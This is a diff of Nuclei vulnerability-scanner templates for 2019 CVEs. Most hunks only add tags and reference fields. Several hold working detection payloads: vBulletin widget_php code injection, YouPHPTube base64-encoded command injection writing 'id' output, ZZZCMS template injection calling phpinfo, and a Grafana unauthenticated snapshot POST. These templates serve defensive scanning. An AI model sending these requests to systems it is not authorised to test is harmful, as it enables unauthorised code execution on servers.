name: Grafana unauthenticated API
severity: medium
tags: cve,cve2019,grafana
requests:
- body: >-
{"dashboard":
{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows":
[{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires":
3600}
headers:
Content-Type: application/json
Host: '{{Hostname}}'
User-Agent: Mozilla/5.0
- raw:
- |
POST /api/snapshots HTTP/1.1
Host: {{Hostname}}
Connection: close
Content-Length: 235
Accept: */*
Accept-Language: en
Content-Type: application/json
{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
matchers:
- part: body
type: word
words:
- deleteKey
method: POST
path:
- '{{BaseURL}}/api/snapshots'

View File

@ -4,9 +4,8 @@ info:
name: Webmin <= 1.920 Unauhenticated Remote Command Execution
author: bp0lr
severity: high
# Refrence:-https://www.exploit-db.com/exploits/47293
# Refrence:-https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
reference: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
tags: cve,cve2019,webmin,rce
requests:
- raw: #

View File

@ -13,6 +13,7 @@ info:
Source/References:
- https://github.com/GeneralEG/CVE-2019-15858
tags: cve,cve2019,wordpress,wp-pluing,xss
requests:
- method: GET

View File

@ -4,8 +4,8 @@ info:
author: pikpikcu
name: nostromo 1.9.6 - Remote Code Execution
severity: critical
# Source: https://www.exploit-db.com/raw/47837
reference: https://www.exploit-db.com/raw/47837
tags: cve,cve2019,rce
requests:
- raw:

View File

@ -4,6 +4,7 @@ info:
name: Unauthenticated Cisco Small Business WAN VPN Routers Sensitive Info Disclosure
author: dwisiswant0
severity: high
tags: cve,cve2019,cisco
requests:
- method: GET

View File

@ -4,7 +4,8 @@ info:
name: rConfig 3.9.2 - Remote Code Execution
author: pikpikcu
severity: critical
# Source:-https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/
reference: https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/
tags: cve,cve2019,rce,intrusive
requests:
- method: GET

View File

@ -1,25 +0,0 @@
id: CVE-2019-16759-1
info:
name: 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass
author: madrobot
severity: high
# Source:- https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
requests:
- raw:
- |
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
Content-Type: application/x-www-form-urlencoded
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "PHP Version"

View File

@ -1,20 +1,20 @@
id: CVE-2019-16759
info:
name: 0day RCE in vBulletin v5.0.0-v5.5.4
author: dwisiswant0
name: 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass
author: madrobot
severity: high
reference: https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
tags: cve,cve2019,vbulletin,rce
requests:
- raw:
- |
POST /index.php?routestring=ajax/render/widget_php HTTP/1.1
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
Content-Type: application/x-www-form-urlencoded
widgetConfig[code]=echo%20%27bm9uZXhpc3RlbnQ6MTMzNwo=%27%20|%20base64%20-d;%20exit;
- |
POST / HTTP/1.1
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
{"routestring":"ajax\/render\/widget_php","widgetConfig[code]":"echo 'bm9uZXhpc3RlbnQ6MTMzNwo=' | base64 -d; exit;"}
matchers-condition: and
matchers:
- type: status
@ -22,4 +22,4 @@ requests:
- 200
- type: word
words:
- "nonexistent:1337"
- "PHP Version"

View File

@ -5,9 +5,8 @@ info:
author: dwisiswant0
severity: critical
description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.
# References:
# - https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r
reference: https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r
tags: cve,cve2019,dlink,rce
requests:
- raw:

View File

@ -4,7 +4,8 @@ info:
name: Zabbix Authentication Bypass
author: Harsh Bothra
severity: critical
# source:- https://nvd.nist.gov/vuln/detail/CVE-2019-17382
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-17382
tags: cve,cve2019,zabbix
requests:
- method: GET

View File

@ -5,6 +5,7 @@ info:
author: pikpikcu
severity: critical
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17506
tags: cve,cve2019,dlink
requests:
- method: POST

View File

@ -4,9 +4,10 @@ info:
name: Apache Solr 8.3.0 - Remote Code Execution via Velocity Template
author: pikpikcu
severity: critical
refrense: https://nvd.nist.gov/vuln/detail/CVE-2019-17558
tags: cve,cve2019,apache,rce
# Refrense:https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133
# https://nvd.nist.gov/vuln/detail/CVE-2019-17558
# Issues:-https://issues.apache.org/jira/browse/SOLR-13971
requests:

View File

@ -4,8 +4,8 @@ info:
name: Openfire Full Read SSRF
author: pdteam - nuclei.projectdiscovery.io
severity: critical
# Source:- https://swarm.ptsecurity.com/openfire-admin-console/
refrense: https://swarm.ptsecurity.com/openfire-admin-console/
tags: cve,cve2019,ssrf
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: Rumpus FTP Web File Manager 8.2.9.1 XSS
author: madrobot
severity: medium
tags: cve,cve2019,xss
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: Citrix ADC Directory Traversal
author: organiccrap
severity: high
tags: cve,cve2019,citrix,traversal
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: phpMyChat-Plus XSS
author: madrobot
severity: medium
tags: cve,cve2019,xss
requests:
- method: GET

View File

@ -4,8 +4,8 @@ info:
name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
author: KBA@SOGETI_ESEC, madrobot & dwisiswant0
severity: medium
# Source:- https://www.exploit-db.com/exploits/48698
refrense: https://www.exploit-db.com/exploits/48698
tags: cve,cve2019,wordpress,wp-plugin
requests:
- method: GET

View File

@ -4,10 +4,10 @@ info:
name: Neon Dashboard - XSS Reflected
author: knassar702
severity: medium
description: |
An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter.
Source/References:
- https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html
description: An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter.
refrense: https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html
tags: cve,cve2019,xss
requests:
- method: GET
path:

View File

@ -4,6 +4,7 @@ info:
name: Oracle Business Intelligence Path Traversal
author: madrobot
severity: high
tags: cve,cve2019,oracle,traversal
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: Oracle WebLogic Server - Unauthenticated RCE
author: dwisiswant0
severity: critical
tags: cve,cve2019,oracle,weblogic,rce
# Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services).
# Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0.

View File

@ -1,10 +1,10 @@
id: CVE-2019-3396
info:
author: "Harsh Bothra"
name: "Atlassian Confluence Path Traversal"
author: Harsh Bothra
name: Atlassian Confluence Path Traversal
severity: high
# https://github.com/x-f1v3/CVE-2019-3396
refrense: https://github.com/x-f1v3/CVE-2019-3396
tags: cve,cve2019,atlassian,confluence,traversal,rce
requests:
- raw:

View File

@ -5,8 +5,8 @@ info:
author: pdteam
severity: medium
description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter.
# Source:- https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
refrense: https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
tags: cve,cve2019,atlassian,jira,xss
requests:
- method: GET

View File

@ -3,6 +3,7 @@ info:
name: Spring-Cloud-Config-Server Directory Traversal
author: madrobot
severity: high
tags: cve,cve2019,traversal
requests:
- method: GET

View File

@ -0,0 +1,34 @@
id: CVE-2019-5127
info:
name: YouPHPTube Encoder RCE
author: pikpikcu
severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-5127
tags: cve,cve2019,rce
requests:
- method: GET
path:
- "{{BaseURL}}/objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png" #CVE-2019-5127
- "{{BaseURL}}/objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" #CVE-2019-5128
- "{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" #CVE-2019-5129
headers:
Content-Type: application/x-www-form-urlencoded
- method: GET
path:
- "{{BaseURL}}/objects/nuclei.txt"
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
regex:
- "uid(.*)"
- "gid(.*)"
part: body
condition: and
- type: status
status:
- 200

View File

@ -4,7 +4,8 @@ info:
name: File Content Disclosure on Rails
author: omarkurt
severity: medium
# reference: https://github.com/omarkurt/CVE-2019-5418
reference: https://github.com/omarkurt/CVE-2019-5418
tags: cve,cve2019,rails,traversal
requests:
- method: GET

View File

@ -4,14 +4,9 @@ info:
name: WordPress Plugin Sell Media v2.4.1 - Cross-Site Scripting
author: dwisiswant0
severity: medium
# A Cross-site scripting (XSS) vulnerability
# in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress
# allows remote attackers to inject arbitrary web script or HTML
# via the keyword parameter (aka $search_term or the Search field).
# --
# References:
# > https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
description: A Cross-site scripting (XSS) vulnerability in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field).
references: https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
tags: cve,cve2019,wordpress,wp-plugin,xss
requests:
- method: GET

View File

@ -6,7 +6,7 @@ info:
severity: critical
description: Some field types do not properly sanitize data from non-form sources in Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary PHP code execution in some cases.
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-6340
product: Drupal
tags: cve,cve2019,drupal,rce
requests:
- method: POST

View File

@ -5,6 +5,7 @@ info:
author: randomrobbie
severity: high
description: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read / SSRF
tags: cve,cve2019,wordpress,wp-pluing,ssrf
requests:
- raw:

View File

@ -4,6 +4,7 @@ info:
name: Zarafa WebApp Reflected XSS
author: pd-team
severity: low
tags: cve,cve2019,zarafa,xss
requests:
- method: GET

View File

@ -4,10 +4,11 @@ info:
name: eMerge E3 1.00-06 - Remote Code Execution
author: pikpikcu
severity: critical
refrence: https://www.exploit-db.com/exploits/47619
tags: cve,cve2019,emerge,rce
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Refrence: https://www.exploit-db.com/exploits/47619
requests:
- raw: # Default Port

View File

@ -4,6 +4,8 @@ info:
name: Kibana Timelion Arbitrary Code Execution
author: dwisiswant0
severity: critical
reference: https://github.com/mpgn/CVE-2019-7609
tags: cve,cve2019,kibana,rce
# Kibana versions before 5.6.15 and 6.6.1
# contain an arbitrary code execution flaw in the Timelion visualizer.
@ -11,9 +13,6 @@ info:
# that will attempt to execute javascript code.
# This could possibly lead to an attacker executing arbitrary commands
# with permissions of the Kibana process on the host system.
# --
# References:
# - https://github.com/mpgn/CVE-2019-7609
requests:
- method: POST

View File

@ -3,11 +3,18 @@ info:
name: JIRA Directory Traversal
author: Kishore Krishna (siLLyDaddy)
severity: medium
tags: cve,cve2019,atlassian,jira,traversal
requests:
- method: GET
path:
- >-
{{BaseURL}}/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
- raw:
- |
GET /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: deflate
matchers-condition: and
matchers:
- type: status

View File

@ -4,8 +4,8 @@ info:
name: JIRA Unauthenticated Sensitive Information Disclosure
author: Harsh Bothra
severity: medium
# source:- https://www.doyler.net/security-not-included/more-jira-enumeration
reference: https://www.doyler.net/security-not-included/more-jira-enumeration
tags: cve,cve2019,atlassian,jira
requests:
- method: GET

View File

@ -2,8 +2,10 @@ id: CVE-2019-8451
info:
name: JIRA SSRF in the /plugins/servlet/gadgets/makeRequest resource
author: "TechbrunchFR"
author: TechbrunchFR
severity: medium
reference: https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
tags: cve,cve2019,atlassian,jira,ssrf
# On September 9, Atlassian released version 8.4.0 for Jira Core and Jira Software, which included a fix for an important
# security issue reported in August 2019.
@ -13,7 +15,6 @@ info:
# An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable
# Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal
# network resources.
# https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
# https://twitter.com/benmontour/status/1177250393220239360
# https://twitter.com/ojensen5115/status/1176569607357730817

View File

@ -4,6 +4,7 @@ info:
name: Totaljs - Unathenticated Directory Traversal
author: madrobot
severity: high
tags: cve,cve2019,totaljs,traversal
requests:
- method: GET

View File

@ -3,6 +3,7 @@ info:
name: Wavemaker Studio 6.6 LFI/SSRF
author: madrobot
severity: high
tags: cve,cve2019,wavemaker,lfi,ssrf
requests:
- method: GET

View File

@ -0,0 +1,28 @@
id: CVE-2019-9041
info:
name: ZZZCMS 1.6.1 RCE
author: pikpikcu
severity: high
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-9041
tags: cve,cve2019,zzzcms,rce
requests:
- method: POST
path:
- "{{BaseURL}}/search/"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}
matchers-condition: and
matchers:
- type: word
words:
- "phpinfo"
- "PHP Version"
part: body
- type: status
status:
- 200

View File

@ -2,9 +2,10 @@ id: CVE-2019-9670
info:
name: Zimbra Collaboration XXE
description: "mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability."
description: Mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability.
author: ree4pwn
severity: critical
tags: cve,cve2019,zimbra,xxe
requests:
- raw:

View File

@ -3,6 +3,8 @@ info:
name: Artifactory Access-Admin Login Bypass
author: akshansh
severity: critical
tags: cve,cve2019,artifactory
requests:
- raw:
- |

Some files were not shown because too many files have changed in this diff Show More